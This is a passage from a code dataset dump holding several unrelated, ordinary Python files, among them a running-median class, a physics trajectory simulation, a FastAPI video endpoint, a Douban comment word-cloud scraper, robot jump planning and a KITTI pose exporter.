and min\n heap are (almost) the same. We just need to pop elements from the heap.\n\n :return: A float number of the current median.\n \"\"\"\n if not self.max_heap and not self.min_heap:\n return 0\n if self.max_heap_size > self.min_heap_size:\n neg_median, _ = self.max_heap[0]\n return - neg_median\n elif self.max_heap_size < self.min_heap_size:\n pos_median, _ = self.min_heap[0]\n return pos_median\n else:\n neg_median, _ = self.max_heap[0]\n pos_median, _ = self.min_heap[0]\n return (pos_median - neg_median) / 2\n\n def balance(self):\n \"\"\"Move an entry from one heap to another if the difference in heap\n sizes become smaller after the move.\n\n Takes O(lg(u)) as time complexity, where u is the number of UNIQUE\n elements in the data stream so far.\n\n Algorithmically, check if the difference in heap sizes is greater than\n the size of the top element in the larger heap. If yes, move the top\n element from the larger heap to the smaller heap. The insertion to a\n heap of size u takes O(lg(u)).\n\n \"\"\"\n if self.max_heap:\n _, occurrence = self.max_heap[0]\n if self.max_heap_size >= self.min_heap_size + occurrence[0]:\n number, occurrence = heapq.heappop(self.max_heap)\n heapq.heappush(self.min_heap, (- number, occurrence))\n self.max_heap_size -= occurrence[0]\n self.min_heap_size += occurrence[0]\n\n if self.min_heap:\n _, occurrence = self.min_heap[0]\n if self.max_heap_size < self.min_heap_size - occurrence[0]:\n number, occurrence = heapq.heappop(self.min_heap)\n heapq.heappush(self.max_heap, (- number, occurrence))\n self.max_heap_size += occurrence[0]\n self.min_heap_size -= occurrence[0]\n\n def put(self, elem):\n \"\"\"Put an element into the data stream.\n\n Takes O(lg(u)) as time complexity, where u is the number of UNIQUE\n elements in the data stream so far.\n\n Algorithmically, if the element has occurred before, we only need to\n update its number of occurrence. If it is an element we have seen for\n the first time, we need to\n (1) Insert it into the hash table (Takes O(1))\n (2) Insert the same entry into the max or min heap (depend on whether\n the element is greater than the median) (Takes O(lg(u)))\n (3) Rebalance once. 
(Takes O(lg(u)))\n\n :param elem: The element to put into the data stream\n \"\"\"\n if elem in self.lookup_table:\n if elem < self.get_median():\n self.max_heap_size += 1\n else:\n self.min_heap_size += 1\n\n _, number_occurrence = self.lookup_table[elem]\n number_occurrence[0] += 1\n else:\n if elem <= self.get_median():\n self.lookup_table[elem] = (- elem, [1])\n heapq.heappush(self.max_heap, self.lookup_table[elem])\n self.max_heap_size += 1\n else:\n self.lookup_table[elem] = (elem, [1])\n heapq.heappush(self.min_heap, self.lookup_table[elem])\n self.min_heap_size += 1\n\n self.balance()\n\n\ndef get_len_iter(line_iter):\n \"\"\"Get a stream of the number of words per line.\n\n :param line_iter: An iterable object of strings(words concat by space)\n :return: A generator of ints, counting the number of words in each line.\n \"\"\"\n for line in line_iter:\n yield len(line.strip().split(' '))\n\n\ndef parse_opt():\n \"\"\"Parse the command line arguments.\n\n :return: Args that has been parsed\n \"\"\"\n cmd_parser = optparse.OptionParser(\n usage='python3 running_median.py [options]\\n'\n 'Output running medians for the number of words per line.')\n cmd_parser.add_option('-i', '--input', action='store', default='wc_input',\n dest='input',\n help='The input directory to read the text files')\n cmd_parser.add_option('-o', '--output', action='store',\n default='wc_output/med_result.txt', dest='output',\n help='The output path to write the results')\n options, _ = cmd_parser.parse_args()\n return options\n\n\ndef run_stream_from_file(file_name, output, stream):\n \"\"\"Open a file to run the running median algorithm. Use the number of words\n per line as the input data stream\n\n :param file_name: The input file where we use the number of words per line\n as the input data stream\n :param output: An output object to write the result\n :param stream: A RunningMedian object to run the running median\n \"\"\"\n with open(file_name, 'r') as inputfile:\n for number in get_len_iter(inputfile):\n stream.put(number)\n output.write(str(stream.get_median()) + '\\n')\n\n\ndef main():\n options = parse_opt()\n stream = RunningMedian()\n\n with open(options.output, 'w') as output:\n for file_name in util.get_file_names(options.input):\n run_stream_from_file(file_name, output, stream)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/running_median.py","file_name":"running_median.py","file_ext":"py","file_size_in_byte":6918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"415259081","text":"__author__ = 'UID_0'\n__version__ = '0.0.8'\n\ntry:\n import sys\n import time\n import numpy as np\n import itertools as it\n from scipy import arange\n from copy import deepcopy\n from multiprocessing import Pool\n import scipy.integrate as integrate\n from scipy.interpolate import interp1d\n from multiprocessing.dummy import Pool as ThreadPool\nexcept ImportError as e:\n print(\"couldn't load module {}\".format(e))\n\ndef timeit(method):\n def timed(*args, **kwargs):\n ts = time.time()\n result = method(*args, **kwargs)\n te = time.time()\n print('%r %2.2f ms' % (method.__name__, (te - ts)*1000))\n return result\n return timed\n\nclass OverTime(Exception):\n def __init__(self):\n super().__init__(\"Full tau_max is exceed\")\n\nclass StatPy(object):\n \"\"\"\n \"\"\"\n def __init__(self, size = None, mdict = None):\n if (size == None):\n size = 200\n # free surface velocity\n self.vs = 2.00001\n # time accuracy and max time\n self.tau_max = 10\n 
self.dt = self.tau_max/(size)\n\n self.eps = self.dt/10\n\n self._t = np.zeros(shape = (size + 1, ))\n self._z = np.zeros(shape = (size + 1, ))\n self._v = np.zeros(shape = (size + 1, ))\n\n self.n = np.zeros(shape = (size, ))\n self.v = np.zeros(shape = (size, ))\n self.z = np.zeros(shape = (size, ))\n\n if (mdict == None):\n self.mdict ={\n 'path': 'images/' + 'scattering' + '_',\n 'window_title': 'Particle distribution',\n 'xscale': 'linear',\n 'yscale': 'linear',\n 'xlim_min': 0.8,\n 'xlim_max': 4.0,\n 'ylim_min': 0.0,\n 'ylim_max': 0.12,\n 'set_xlabel': r'$\\frac{\\omega}{2k_0}$',#r'$\\frac{\\omega}{2k_0}$'\n 'set_ylabel': r'$I(\\omega)$'\n }\n elif (isinstance(mdict, dict)):\n self.mdict = mdict\n else:\n raise TypeError(\"Wrong type for mdict!\")\n\n def getAttr(self):\n return deepcopy(self.v), deepcopy(self.n)\n\n def calcTrajectories(self, d, v0, t):\n \"\"\"\n calculate particle trajectories\n t = [], z = [], v = []\n \"\"\"\n a = 0.4*10**(-4)\n tau = 0\n tau_mid = 0\n #shockwave velocity\n vsh = 1.25*self.vs\n\n if (v0 < vsh):\n counter = it.count()\n k = next(counter)\n self._t[k] = 0\n self._z[k] = 0\n self._v[k] = v0\n\n while (tau < self.tau_max):\n k = next(counter)\n tau += self.dt\n self._z[k] = d/(5*a)*np.log(1 + 5.0/d*abs(v0 - self.vs)*tau) + self.vs*tau\n self._v[k] = (v0 - self.vs)/(1 + 5.0/d*(v0 - self.vs)*tau) + self.vs\n self._t[k] = tau\n else:\n counter = it.count()\n k = next(counter)\n #k = 0\n self._t[k] = 0\n self._z[k] = 0\n self._v[k] = v0\n\n try:\n while (tau < self.tau_max):\n tau += self.dt\n if (d*np.log(1 + (1/d)*v0*tau) <= vsh*tau):\n print(d*np.log(1 + (1/d)*v0*tau) - vsh*tau)\n tau_mid = tau\n print(tau)\n break\n else:\n k = next(counter)\n self._z[k] = d/a*np.log(1 + 1/d*v0*tau)\n self._v[k] = v0/(1 + 1/d*v0*tau)\n self._t[k] = tau\n\n if (tau >= self.tau_max):\n print(tau)\n raise OverTime()\n else:\n k = next(counter)\n v_mid = v0/(1 + 1/d*v0*tau_mid)\n self._z[k] = vsh*tau_mid\n self._v[k] = v_mid\n self._t[k] = tau_mid\n\n tau = tau_mid\n\n if (v_mid < self.vs):\n while (tau < self.tau_max):\n k = next(counter)\n tau += self.dt\n self._z[k] = (-d/(5*a)*np.log(1 + 5.0/d*(self.vs-v_mid)*(tau-tau_mid))\n + self.vs*tau + tau_mid*0.25*self.vs)\n self._v[k] = ((v_mid - self.vs)/(1 - 5.0/d*(v_mid - self.vs)*(tau-tau_mid))\n + self.vs)\n self._t[k] = tau\n\n if (v_mid > self.vs):\n while (tau < self.tau_max):\n k = next(counter)\n tau += self.dt\n self._z[k] = (d/(5*a)*np.log(1+5.0/d*(v_mid - self.vs)*(tau - tau_mid))\n + self.vs*tau + tau_mid*0.25*self.vs)\n self._v[k] = ((v_mid - self.vs)/(1 + 5.0/d*(v_mid - self.vs)*(tau - tau_mid))\n + self.vs)\n self._t[k] = tau\n finally:\n idx = np.where(abs(self._t - t) <= self.eps)\n print(idx[0])\n return self._z[idx], self._v[idx]\n #@timeit\n def calcDistr(self, d, t, grid, form = 'quad'):\n \"\"\"\n calculate distribution n(d,u) and u, z main lists for time = t\n \"\"\"\n counter = it.count()\n for item in grid:\n k = next(counter)\n self.n[k] = self.distribution(d, item, form)\n self.z[k], self.v[k] = self.calcTrajectories(d, item, t)\n @timeit\n def d_Distr(self, t, grid):\n \"\"\"\n \"\"\"\n d_max = 100\n f = []\n #f = np.zeros(shape=(d_max, 1), dtype = type)\n v_min = np.zeros(shape=(d_max, ))\n v_max = np.zeros(shape=(d_max, ))\n\n for d in range(1, d_max):\n print('%r percents completed' % d)\n self.calcDistr(d, t, grid)\n v_min[d-1] = min(self.v)\n v_max[d-1] = max(self.v)\n f.append(interp1d(self.v, self.n, bounds_error = False, fill_value = 0.0))\n\n items = np.zeros_like(self.n)\n grid_new = 
np.linspace(min(v_min), max(v_max), len(grid))\n\n for item in f:\n items = items + item(grid_new)\n self.n = np.array(items, copy = False)\n self.v = np.array(grid_new, copy = False)\n return\n\n def tau(self, t, grid):\n \"\"\"\n \"\"\"\n def v(z):\n idx = np.where(self.z == z)\n return self.v[idx]\n\n d_max = 100\n f = []\n z_min = np.zeros(shape=(d_max, ))\n z_max = np.zeros(shape=(d_max, ))\n\n for d in range(1, d_max):\n print(d)\n self.calcDistr(d, t, grid)\n z_min[d-1] = min(self.z)\n z_max[d-1] = max(self.z)\n f.append(interp1d(self.z, self.n*self.v, bounds_error = False, fill_value = 0.0))\n\n items = np.zeros_like(self.n)\n grid_new = np.linspace(min(z_min), max(z_max), len(grid))\n\n for item in f:\n items = items + item(grid_new)\n self.n = np.array(items, copy = False)\n self.z = np.array(grid_new, copy = False)\n return deepcopy(self.z), deepcopy(self.n)\n @timeit\n def calcIntensity(self, t):\n grid_w = np.linspace(self.vs/2, 2*self.vs, 200)\n\n d_max = 100\n f = []\n v_min = np.zeros(shape=(d_max, ))\n v_max = np.zeros(shape=(d_max, ))\n\n for d in range(1, d_max):\n print(d)\n self.calcDistr(d, t, grid_w)\n v_min[d-1] = min(self.v)\n v_max[d-1] = max(self.v)\n f.append(interp1d(self.v, np.exp(-2*self.n*self.v)*self.n,\n bounds_error = False, fill_value = 0.0))\n\n items = np.zeros_like(np.exp(-2*self.n*self.v)*self.n)\n grid_new = np.linspace(min(v_min), max(v_max), len(grid_w))\n\n for item in f:\n items = items + item(grid_new)\n self.n = np.array(items, copy = False)\n self.v = np.array(grid_new, copy = False)\n return\n\n @staticmethod\n def distribution(d, v, form = None, delta = 0.2):\n \"\"\"\n exponential approximation of Sorenson data\n \"\"\"\n if (form == None):\n form = 'zero'\n a = -0.418714 + 0.586249*v -0.0608715*v**2\n A = (np.pi/6)*(integrate.quad(lambda d: d**3*np.exp(-a*d), 1, 100)[0])\n A = (1/delta)*np.exp(-(v-1)/delta)/A\n #A = (3/4*np.pi)*(1/delta)*np.exp(-(v-1)/delta)*np.exp(a)*a**4/(6 + 6*a + 3*a**2 + a**3)\n\n mdict ={\n 'zero': A*np.exp(-a*d),\n 'quad': A*np.exp(-a*d)*d**2,\n 'cubic': A*np.exp(-a*d)*d**3\n }\n return mdict[form]\n\n def plotDistr(self, d, t, graphType = None):\n \"\"\"\n plots a histogram\n \"\"\"\n import matplotlib\n matplotlib.rcParams['text.usetex'] = True\n import matplotlib.pylab as pl\n import numpy as np\n\n fig = pl.figure(figsize = (11,11))\n fig.canvas.set_window_title(self.mdict['window_title'])\n\n plot = fig.add_subplot(1, 1, 1)\n plot.set_xscale(self.mdict['xscale'])\n plot.set_yscale(self.mdict['yscale'])\n #plot.set_xlim(self.mdict['xlim_min'], self.mdict['xlim_max'])\n #plot.set_ylim(self.mdict['ylim_min'], self.mdict['ylim_max'])\n plot.tick_params(axis = 'both', which = 'major', labelsize = 28)\n plot.set_xlabel(r'' + self.mdict['set_xlabel'], fontsize = 28)\n plot.set_ylabel(r'' + self.mdict['set_ylabel'], fontsize = 28)\n plot.set_title(r'$\\frac{t}{t_{0}}=$' +' '+ str(t) + ', '\n + r'$t_{0} = \\frac{d_{min}}{av_s}$'\n + ', ' + r'$d_{min} = 1~\\mu m$',fontsize = 28)\n try:\n pl.grid(True)\n if (graphType == None):\n pl.hist(self.v, bins = 50, weights = self.n, normed = False,\n label = 'd = ' + str(d) + r'$\\mu m$')\n else:\n pl.plot(self.v, self.n)\n #pl.legend()\n pl.savefig(self.mdict['path'] + 't=' + str(t) + 'd=' + str(d) + '.png')\n except Exception as e:\n print('{}'.format(e))\n finally:\n #pl.show()\n pl.close()\n return\n\ndef makeGrid(v_min, v_max, size = None):\n \"\"\"\n \"\"\"\n if (size == None):\n size = 200\n return np.linspace(v_min, v_max, size)\n\ndef main():\n t = 0.0\n stat = 
StatPy()\n grid = makeGrid(1, 4)\n stat.calcTrajectories(10, 4.0, t)\n #stat.calcDistr(1, t, grid)\n #stat.tau(t, grid)\n #stat.d_Distr(t, grid)\n #stat.calcIntensity(t)\n #stat.plotDistr('d', t, graphType = 'plot')\n\nif __name__ == '__main__':\n main()\n","sub_path":"intensity_test.py","file_name":"intensity_test.py","file_ext":"py","file_size_in_byte":11109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"181098486","text":"import datetime\n\ndef main(j, args, params, tags, tasklet):\n guid = args.getTag('id')\n if not guid:\n out = 'Missing NIC guid param \"guid\"'\n params.result = (out, args.doc)\n return params\n\n nic = j.core.portal.active.osis.get('system', 'nic', guid)\n if not nic:\n params.result = ('NIC with guid %s not found' % guid, args.doc)\n return params\n\n def objFetchManipulate(id):\n nic['lastcheck'] = datetime.datetime.fromtimestamp(nic['lastcheck']).strftime('%Y-%m-%d %H:%M:%S')\n nic['ipaddr'] = ', '.join([str(x) for x in nic['ipaddr']])\n return nic\n\n push2doc=j.apps.system.contentmanager.extensions.macrohelper.push2doc\n\n return push2doc(args,params,objFetchManipulate)\n\ndef match(j, args, params, tags, tasklet):\n return True\n","sub_path":"apps/gridportal/base/Grid/.macros/wiki/nic/1_nic.py","file_name":"1_nic.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"130094209","text":"# PYTHON3 FILE\n\n# Create a new empty list\nnumlist = list()\nwhile True:\n inp = input('Enter a number or done : ')\n if inp == 'done' : break\n # Convert the value to a float number\n value = float(inp)\n # Add value to the list\n numlist.append(value)\n # Average using built in functions\naverage = sum(numlist)/len(numlist)\nprint('Average :', average)\n","sub_path":"PythonDatastructures/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"116289372","text":"#! 
python3\r\n#magic 8 ball with switch dictionary\r\n\r\nimport random\r\nfrom time import sleep\r\n\r\ndef getAnswer(answerNumber):\r\n response = {\r\n 1: 'It is certain',\r\n 2: 'It is decidedly so',\r\n 3: 'Yes',\r\n 4: 'Reply hazy, try again',\r\n 5: 'Ask again later',\r\n 6: 'Concentrate and ask again',\r\n 7: 'My reply is no',\r\n 8: 'Outlook not so good',\r\n }\r\n return response.get(answerNumber, \"fortune teller is unavailable\")\r\n\r\ndef fortune():\r\n r = random.randint(1,9)\r\n print (\"Ask the Magic 8 ball a question to see your fortune:\")\r\n input()\r\n print('Behold your fortune in')\r\n print('...3')\r\n sleep(1)\r\n print('...2')\r\n sleep(1)\r\n print('...1')\r\n sleep(1)\r\n print (getAnswer(r))\r\n\r\nfortune()\r\n","sub_path":"magic8ball.py","file_name":"magic8ball.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"535592957","text":"from distutils.core import setup, Extension\nimport os\n\nmodule1 = Extension('envi2numpy',\n sources = ['pythonwrapper.cpp', 'INIReader.cpp','ini.c','cnpy.cpp','envi_parser.cpp'],\n include_dirs = [],\n\t\textra_compile_args=['-std=c++11','-O2'])\n\nsetup (name = 'envi2numpy',\n version = '1.1',\n description = 'Package used for reading hyperspectral captures',\n ext_modules = [module1],\n\n url='https://github.com/ArendJanKramer/envi2numpy',\n\n # Author details\n author='Arend Jan Kramer',\n author_email='github@arendjan.eu',\n\n # Choose your license\n license='MIT'\n)\n\n","sub_path":"pypi_install_script/envi2numpy-1.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"55597898","text":"from fastapi import FastAPI, UploadFile, File, requests\nfrom fastapi.responses import FileResponse, RedirectResponse\nimport cv2\napp = FastAPI()\n\n\n@app.get(\"/\")\nasync def main():\n return {\"Hello\": \"World!\"}\n\ndef process_video(file_name):\n # Read video file\n cap = cv2.VideoCapture(file_name)\n\n # get height, width and frame count of the video\n width, height = (\n int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)),\n int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n )\n fps = int(cap.get(cv2.CAP_PROP_FPS))\n\n # Define the codec and create VideoWriter object\n fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v')\n out = cv2.VideoWriter()\n output_file_name = \"output.mp4\"\n out.open(output_file_name, fourcc, fps, (width, height), True)\n\n try:\n while cap.isOpened():\n ret, frame = cap.read()\n if not ret:\n break\n \n im = frame\n out.write(im)\n except Exception as _:\n # Release resources\n cap.release()\n out.release()\n \n\n # Release resources\n cap.release()\n out.release()\n\n@app.post(\"/video_upload\")\nasync def upload_video(file: UploadFile = File(...)):\n extension = file.filename.split(\".\")[-1] in (\"mp4\", \"avi\")\n if not extension:\n return \"Video must in mp4 or wav format!\"\n process_video(file.filename)\n return FileResponse(\"output.mp4\", media_type=\"video/mp4\")\n\n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"454572286","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\n#Defining Python Source Code Encodings\n#---------------------------\n\n# import the necessary packages\nimport time\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as 
plt\n\narray = np.zeros((5,3))\n#array = [gerade, rechts, links]\n#        = [......, ....., ...... \n#           ......, ....., ......]\nn = 0\nold ='kein'\n\ndef intell(angle):\n    global array, n, old\n    angle = int(np.median(angle))\n    array[n] = 0\n    if abs(angle) >= 85:\n        array[n][0] = 1\n        old = 'gerade'\n        n += 1\n    elif angle > 0 and abs(angle) < 85: # turn right\n        array[n][1] = 1\n        old = 'rechts'\n        n += 1\n    elif angle < 0 and abs(angle) < 85:\n        array[n][2] = 1\n        old = 'links'\n        n += 1\n\n    if n > 4:\n        n = 0 \n\n    summe = sum(array)\n    maxi = max(summe)\n\n    if maxi == summe[0] and maxi != summe[1] and maxi != summe[2]:\n        old = 'gerade'\n        return 'gerade'\n    elif maxi == summe[1] and maxi != summe[2] and maxi != summe[0]:\n        old = 'rechts'\n        return 'rechts'\n    elif maxi == summe[2] and maxi != summe[0] and maxi != summe[1]:\n        old = 'links'\n        return 'links'\n    else:\n        return old\n    \n\n\n","sub_path":"Code/Video/SW13/Intelligenz/Intelligenz.py","file_name":"Intelligenz.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"376587576","text":"\"\"\"\nPython Douban crawler word cloud\n\"\"\"\nimport re\nimport jieba\nimport pandas as pd\nfrom urllib import request\nfrom bs4 import BeautifulSoup as bs\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom wordcloud import WordCloud\n\nimport numpy as np\n\nCommentList = []\n\nfor a in range(11):\n    url = 'https://movie.douban.com/subject/11537954/comments?start={}&limit=20'.format(a*20)\n    resp = request.urlopen(url)\n    html_data = resp.read().decode('utf-8')\n    # the second argument selects the parser\n    soup = bs(html_data, 'html.parser')\n    comment_eachpage = soup.find_all('div', class_='comment')\n    for item in comment_eachpage: \n        if item.find_all('p')[0].find('span').string is not None:\n            CommentList.append(item.find_all('p')[0].find('span').string)\n\nallcomments = ''\nfor k in range(len(CommentList)):\n    allcomments = allcomments + (CommentList[k]).strip()\n\n\n\npattern = re.compile('[\\\u4e00-\\\u9fa5]+')\nfilterdata = re.findall(pattern, allcomments)\ncomments_zh = ''.join(filterdata) \n\n\nsegment = jieba.lcut(comments_zh)\nwords_detail=pd.DataFrame({'segment':segment})\n\nstopwords=pd.read_csv(r\"D:\\myprograms\\douban\\moviecontent\\chineseStopWords.txt\", index_col=False,quoting=3,sep=\"\\t\",names=['stopword'], encoding=u'gbk')\nwords_detail=words_detail[~words_detail.segment.isin(stopwords.stopword)] \n\n\nwords_result=words_detail.groupby(by=['segment'])['segment'].agg({\"countnum\":np.size})\nwords_result=words_result.reset_index().sort_values(by=[\"countnum\"],ascending=False)\n\n\nmatplotlib.rcParams['figure.figsize'] = (10.0, 5.0)\n\n\nwordcloud=WordCloud(font_path=\"simhei.ttf\",background_color=\"white\",max_font_size=80)\nword_frequence = {x[0]:x[1] for x in words_result.head(1000).values}\n\n\nwordcloud=wordcloud.fit_words(word_frequence)\nfig = plt.gcf()\nplt.imshow(wordcloud)\nfig.savefig('rick&morty.png', dpi=100)","sub_path":"cn/crawer/01DouBan.py","file_name":"01DouBan.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"30490505","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport rospy\n\nfrom walking_py import geom\nfrom walking_py import contact\nfrom walking_py import integrated_plan\nimport walking_ros\n\nfrom sample_hrp2_walk import SampleHrp2Walk\n\n\nclass SampleHrp2Jump(SampleHrp2Walk):\n    def plan(self):\n        initial_stance = contact.Stance(\n            [contact.Contact(\"lleg_end_coords\", 
geom.Frame.new(np.array([0., 0.105, 0.]))),\n contact.Contact(\"rleg_end_coords\", geom.Frame.new(np.array([0., -0.105, 0.])))])\n lleg_cnt1 = contact.Contact(\"lleg_end_coords\", geom.Frame.new(np.array([0.4, 0.105, 0.])))\n rleg_cnt1 = contact.Contact(\"rleg_end_coords\", geom.Frame.new(np.array([0.4, -0.105, 0.])))\n cnt_action_seq = [contact.ContactAction(initial_stance.contact(\"lleg_end_coords\"), 1.00, contact.ContactAction.detach),\n contact.ContactAction(initial_stance.contact(\"rleg_end_coords\"), 1.05, contact.ContactAction.detach),\n contact.ContactAction(lleg_cnt1, 1.25, contact.ContactAction.attach),\n contact.ContactAction(rleg_cnt1, 1.30, contact.ContactAction.attach)]\n initial_jposs = np.zeros(self.robot.njoint)\n initial_jposs[self.robot.joints.index(self.robot.joint(\"LLEG_JOINT3\"))] = 0.5\n initial_jposs[self.robot.joints.index(self.robot.joint(\"RLEG_JOINT3\"))] = 0.5\n\n self.integrated_planner = integrated_plan.IntegratedMotionPlanner(\n self.robot,\n dt=0.03)\n\n self.integrated_planner.run(\n initial_stance,\n cnt_action_seq,\n cnt_traj_conv_run_kwargs={\n \"final_period\": 1.0,\n \"cog_offset\": np.array([0.03, 0., 0.6])},\n centroid_plan_init_kwargs={\n \"horizon_z\": 60,\n \"horizon_xy\": 30},\n centroid_plan_run_kwargs={\n \"mpc_xy_kwargs\": {\n \"state_weight\": np.array([1e1, 1e2, 1e1, 1e2, 1e3, 1e3]),\n \"final_state_weight\": np.array([1e1, 1e2, 1e1, 1e2, 1e3, 1e3])}},\n fullbody_plan_run_kwargs={\n \"initial_jposs\": initial_jposs,\n \"initial_ik_kwargs\": {\n \"jlist\": self.ik_jlist},\n \"ik_kwargs\": {\n \"jlist\": self.ik_jlist,\n \"trg_momentum_weight\": np.array([1e-4, 1e-4, 1e-4, 1e-4, 1e-4, 1e-4])}})\n\n\nif __name__ == \"__main__\":\n demo = SampleHrp2Jump(\"sample_hrp2_jump\")\n demo.main()\n","sub_path":"walking/walking_ros/samples/sample_hrp2_jump.py","file_name":"sample_hrp2_jump.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"650080800","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass WorkspacePurgeResponse(Model):\n \"\"\"Response containing operationId for a specific purge action.\n\n All required parameters must be populated in order to send to Azure.\n\n :param operation_id: Required. 
Id to use when querying for status for a\n particular purge operation.\n :type operation_id: str\n \"\"\"\n\n _validation = {\n 'operation_id': {'required': True},\n }\n\n _attribute_map = {\n 'operation_id': {'key': 'operationId', 'type': 'str'},\n }\n\n def __init__(self, **kwargs):\n super(WorkspacePurgeResponse, self).__init__(**kwargs)\n self.operation_id = kwargs.get('operation_id', None)\n","sub_path":"sdk/loganalytics/azure-mgmt-loganalytics/azure/mgmt/loganalytics/models/workspace_purge_response.py","file_name":"workspace_purge_response.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"26047759","text":"class tower:\n\tdef __init__(self,i):\n\t\tself.disks = []\n\t\tself.index = i \n\n\tdef index(self):\n\t\treturn self.index\n\n\tdef add(self,d):\n\t\tif self.disks:\n\t\t\tif self.disks[-1] <= d:\n\t\t\t\traise Exception('Error placing disk' + d)\n\t\tself.disks.append(d)\n\n\tdef moveTopTo(self,t):\n\t\tif self.disks:\n\t\t\ttop = self.disks.pop()\n\t\t\tt.add(top)\n\n\tdef moveDisks(self,n,destination,buffer):\n\t\tif n > 0:\n\t\t\tself.moveDisks(n-1,buffer,destination)\n\t\t\tself.moveTopTo(destination)\n\t\t\tbuffer.moveDisks(n-1,destination,self)\n\ndef printTowers(t):\n\tindex = 0\n\tfor i in t:\n\t\tprint(f'Tower {index}:', end = ' ')\n\t\tprint(i.disks)\n\t\tindex += 1\n\ndef main():\n\tn = 10\n\ttowers = [tower(i) for i in range(3)]\n\n\tfor i in range(n,0,-1):\n\t\ttowers[0].add(i)\n\n\tprintTowers(towers)\n\ttowers[0].moveDisks(n,towers[2],towers[1])\n\tprintTowers(towers)\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Chapter 8/8.6.py","file_name":"8.6.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"393941268","text":"\"\"\"Calculate camera pose and write to a file inside the original kitti folder\"\"\"\nimport itertools\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\n\nimport pykitti\nimport os\n\ndef write_file(filename, path, Ts):\n out_path = os.path.join(path, filename)\n with open(out_path, 'w') as f:\n f.write( \"\\n\".join( \" \".join(map(str, x.reshape(-1)[:12])) for x in Ts) )\n\ndef generate_pose_file(basedir, date, drive, seq_path):\n # Load the data. 
Optionally, specify the frame range to load.\n dataset = pykitti.raw(basedir, date, drive)\n # dataset = pykitti.raw(basedir, date, drive, frames=range(0, 5, 5))\n\n ## loop over all frames, calculate camera pose and write to a file\n T_cam2_imu = dataset.calib.T_cam2_imu\n T_imu_cam2 = np.linalg.inv(T_cam2_imu)\n T_cam3_imu = dataset.calib.T_cam3_imu\n T_imu_cam3 = np.linalg.inv(T_cam3_imu)\n T_velo_imu = dataset.calib.T_velo_imu\n T_imu_velo = np.linalg.inv(T_velo_imu)\n\n T_w_imus = []\n\n T_w_cam2s = []\n T_cam20_cam2s = []\n\n T_w_cam3s = []\n T_cam30_cam3s = []\n\n T_w_velos = []\n T_velo0_velos = []\n for oxt in dataset.oxts:\n T_w_imus.append(oxt.T_w_imu)\n\n T_w_cam2 = np.dot(oxt.T_w_imu, T_imu_cam2)\n T_w_cam2s.append(T_w_cam2)\n T_cam20_cam2s.append( np.dot(np.linalg.inv(T_w_cam2s[0]), T_w_cam2) )\n\n T_w_cam3 = np.dot(oxt.T_w_imu, T_imu_cam3)\n T_w_cam3s.append(T_w_cam3)\n T_cam30_cam3s.append( np.dot(np.linalg.inv(T_w_cam3s[0]), T_w_cam3) )\n\n T_w_velo = np.dot(oxt.T_w_imu, T_imu_velo)\n T_w_velos.append(T_w_velo)\n T_velo0_velos.append( np.dot(np.linalg.inv(T_w_velos[0]), T_w_velo) )\n\n\n out_file_folder = os.path.join(seq_path, 'poses')\n if not os.path.exists(out_file_folder):\n os.mkdir(out_file_folder)\n\n out_file = 'imu.txt'\n write_file(out_file, out_file_folder, T_w_imus)\n\n out_file = 'cam_02.txt'\n write_file(out_file, out_file_folder, T_w_cam2s)\n\n out_file = 'cam_03.txt'\n write_file(out_file, out_file_folder, T_w_cam3s)\n \n out_file = 'velo.txt'\n write_file(out_file, out_file_folder, T_w_velos)\n\n\n# Change this to the directory where you store KITTI data\nbasedir = '/media/sda1/minghanz/datasets/kitti/kitti_data'\n\n# # Specify the dataset to load\n# date = '2011_09_26'\n# drive = '0001'\n\n## loop over all sequences\ndates = os.listdir(basedir)\ndates = [date for date in dates if os.path.isdir(os.path.join(basedir, date) ) ]\n\nfor date in dates:\n date_path = os.path.join(basedir, date)\n seqs = os.listdir(date_path)\n seqs = [seq for seq in seqs if os.path.isdir(os.path.join(date_path, seq))]\n for seq in seqs:\n seq_path = os.path.join(date_path, seq)\n 